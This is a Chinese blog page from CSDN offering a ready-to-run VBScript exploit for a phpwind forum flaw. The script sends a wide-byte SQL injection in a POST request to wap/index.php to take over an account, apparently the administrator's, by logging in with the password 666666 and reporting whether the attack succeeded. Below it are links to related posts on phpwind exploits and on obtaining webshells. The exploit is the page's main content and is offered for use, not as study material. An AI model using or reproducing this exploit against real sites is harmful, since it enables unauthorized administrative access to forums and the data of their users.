phpwind任意修改管理员密码漏洞 VBS版利用程序

最新推荐文章于 2023-03-10 14:53:18 发布
最新推荐文章于 2023-03-10 14:53:18 发布
阅读量2.1k 收藏
点赞数 1
CC 4.0 BY-SA版权
文章标签: c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/gengjindong/article/details/2832076
本文提供了一段VBScript代码,用于演示如何利用PHPWind中的一个安全漏洞,该漏洞允许攻击者通过构造特定的POST请求来修改管理员密码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

’phpwind任意修改管理员密码漏洞 VBS版利用程序 By Tr4c3 
Dim strUrl, strPost, xPost, strGet 
Set Args = Wscript.Arguments 
If Args.count<>2 Then 
Wscript.Echo "Usage: " & Wscript.ScriptName & " http://hi.baidu.com/tr4c3/ 1" 
Wscript.Quit 
Else 
strUrl = Args(0) & "wap/index.php" 
strPost = "db_wapifopen=1&prog=login&pwuser=shit%c1’union select "& Args(1) &",mid(md5(666666),9,16),3,1,5/*&pwpwd=666666" 
Set xPost = CreateObject("Microsoft.XMLHTTP") 
xPost.open "POST", strUrl, False 
xPost.SetRequestHeader "Referer", strUrl 
xPost.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded" 
xPost.send(strPost) 
strGet = xPost.ResponseText 
If InStr(strGet,"登录成功")<>0 Then 
   Wscript.Echo("执行成功") 
Else 
   Wscript.Echo("执行失败") 
End If 
End If 

gengjindong
关注
phpwind漏洞利用
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-10 1025
phpwind漏洞利用,考虑到PHPWind是国内著名的论坛程序利用它建站的网站非常多,我顿时来了兴趣,决定看看这个漏洞怎么利用。 看漏洞的名字好像影PHPWind8.0本,我机子里保存了以前下载的PHPWind v8.0 GBK build 20100810的源程序,在虚拟机里安装后测试漏洞不能利用,换了PHPWindForums v7.5 SP3 GBK整合漏洞利用成功,可能是我机子中之前的本比较新的缘故吧。下面就用PHPWind Forums v7.5 SP3 GBK整合来给大家介绍phpw
phpwind任意修改管理员密码漏洞
HackCode的专栏
08-07 2938
 漏洞说明:PHPWind 论坛系统 是一套采用 php+mysql 数据库方式运行并可生成 html 页面的全新且完善的强大系统。因具有非凡的访问速度和卓越的负载能力而深受国内外朋友的喜爱。但是80sec在其中发现了一个安全漏洞,成功利用漏洞可以直接修改管理员密码进入后台,取得管理员权限。漏洞厂商:http://www.phpwind.net漏洞来源:http://www.80s
修改密码PHP博客,phpwind任意修改管理员密码漏洞
weixin_31510505的博客
03-27 560
漏洞说明:PHPWind 论坛系统 是一套采用 php+mysql 数据库方式运行并可生成 html 页面的全新且完善的强大系统。因具有非凡的访问速度和卓越的负载能力而深受国内外朋友的喜爱。但是80sec在其中发现了一个安全漏洞,成功利用漏洞可以直接修改管理员密码进入后台,取得管理员权限。漏洞厂商:http://www.phpwind.net漏洞来源:http://www.80sec.com/...
phpwind index.php?m=design&c=api,phpwind v9存在命令执行漏洞(登陆后台)
weixin_30249953的博客
03-13 586
已知漏洞:https://www.seebug.org/vuldb/ssvid-94465phpwind v9最新存在命令执行漏洞(登陆后台)Phpwind_v9.0.2(最新),phpwind_v9.0.1命令执行高危(getshell)phpwind是一个基于PHP和MySQL的开源社区程序,是国内最受欢迎的通用型论坛程序之一。社区可提供丰富的应用,满足人们获取信息、交流、娱乐、消费等生活...
Phpwind出现严重安全漏洞
好好学习,天天向上
01-10 1061
近日,国内知名的社区PHPWIND又现严重漏洞程序中有部分变量没有过滤导致任意包含本地文件,从而可以执行任意PHP命令,官方针对这个漏洞已经做出了修补。 phpwind 7.5 Multiple Include Vulnerabilities author: 80vulteam:http://www.80vul.com一.api/class_base.php本地包含漏洞1.描叙 api/cla
获取webshell的十种方法
weixin_30677475的博客
06-22 1082
黑客在入侵企业网站时,通常要通过各种方式获取webshell从而获得企业网站的控制权,然后方便进行之后的入侵行为。本篇文章将如何获取webshell总结成为了十种方法,希望广大的企业网络管理员能够通过了解获取webshell的途径,对企业自身进行防范。 一、通过上传文件类型过滤漏洞获取webshell 由于未采用白名单过滤文件类型,导致asa,cer,等文件类型,未进行限制,asa...
后台拿webshell的常用方法总结
1匹黑马
04-08 1605
后台拿webshell的常用方法总结 一、直接上传获得webshell 这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直接在心情图标管理上传.php类型,虽然没有提示,其实已经成功了,上传的文 件url应该是http://forums/images/smiles/下,前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名,bo-blo...
从后台拿到webshell
HackCode的专栏
07-23 816
前 言 动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站webshell还有一步之遥,但还是有许多新手因想不出合适的方法而被拒之门外。因此,我们把常用的从后台得到webshell的方
phpwind mysql 密码_phpwind发布可任意修改管理员密码漏洞补丁
weixin_33350741的博客
01-19 245
function wap_login($username,$password){global $db,$timestamp,$onlineip,$db_ckpath,$db_ckdomain,$db_bbsurl;$men=$db->get_one("SELECT m.uid,m.password,m.groupid,m.yz,md.onlineip FROM pw_members m LE...
phpwind Exp 漏洞利用
10-30
phpwind Exp 漏洞利用
修改本地用户密码VBS脚本
07-04
修改本地用户ituser密码为cat.2008的VBS脚本
phpwindexp.php,PHPWind v7.5 / v8.0漏洞EXP
weixin_30703633的博客
03-22 543
PHPWind v7.5 / v8.0漏洞EXP 主题关键词:phpwind7.5影响本:PHPWind v7.5 / v8.0命令 :php pking.php user passhttp://www.xxxx.com/pking.php:复制内容到剪贴板程序代码
phpwind9.x和8.7XSS注入以及管理后台脚本注入漏洞
10-18 1527
漏洞描述: phpwind近期公布了2处安全漏洞,分别是富文本编辑器发帖的xss注入(受影响本8.7、9.X)以及管理后台添加新用户时的脚本注入(受影响本8.7)。 影响本: phpwind 9.x以及8.7,8.7.1 漏洞等级: 高危 修复建议: 1、安装官方最新补丁,官方补丁:http://www.phpwind.net/read/3709782 2、添加网站至云观测,及时了解网站组...
漏洞复现:phpwind v 9.0.2后台getshell
qq_41631806的博客
04-05 3787
漏洞复现:phpwind v 9.0.2后台getshell 已知影响本:v9.0.1,v9.0.2 复现本:9.0.2 搭建环境:phpstudy2018 步骤: 1.将源码放置网站根目录(C:\phpStudy\PHPTutorial\WWW)。如下操作,刷新首页,或修改删除目录下.htaccess文件可解决首页访问限制情况: 2.打开install.php页面安装好phpwind后登陆后...
PHPWind v7.5 / v8.0漏洞EXP
收集盒 Book box
08-29 3042
PHPWind v7.5 / v8.0漏洞EXP 主题关键词:phpwind7.5 影响本:PHPWind v7.5 / v8.0 命令 :php pking.php user passhttp://www.xxxx.com/ pking.php:复制内容到剪贴板程序代码
phpwind漏洞与修复方
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-10 609
phpwind漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作。 phpwind9.0一拖再拖终于发布了,看起来很NB的样子,但是其实是谁用谁知道 ,各种bug满天飞,各种报错…这个就是一例,通杀型…,官方不修复,我自己用着新本蛋疼啊.. 签到的时候,在自定义我想说的地方,写几个引号,然后就杯具了..提交后,直接报出绝对路径..
用友漏洞php,Phpwind GET型CSRF任意代码执行漏洞公开
weixin_36285392的博客
03-29 570
这个洞其实很有意思,最可惜的地方就是其触发位置在后台,否则它将是一个绝无仅有的好洞。0x01 后台反序列化位置首先纵览整个phpwindv9,反序列化的位置很多,但基本都是从数据库里取出的,很难完全控制序列化字符串。
最后,找到三处:可恶的是,三处都在后台的Task模块下。Task模块是『任务中心』功能,只有能进入后台的用户才可以访问:随便打开一个, src/applications/task/a...
phpwind暴出跨站漏洞,小漏洞,大危害
网络——菜市场
10-19 2785
 phpwind暴出跨站漏洞,小漏洞,大危害来源:华夏黑客联盟(www.hxhack.com)前言:大家都应该知道,国内主流论坛程序主要有两大家,一种是phpwind论坛程序,一种是dz论坛程序;不知道的,百度搜索一下便知道了。我也是无意间发现这个漏洞的,如果有人恶意利用以下的方法,谁又会想到phpwind官方网站竟然会被人通过这样的方法挂马?小漏洞存在的危害并不小!所以提醒广大的网民一定要警惕网
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值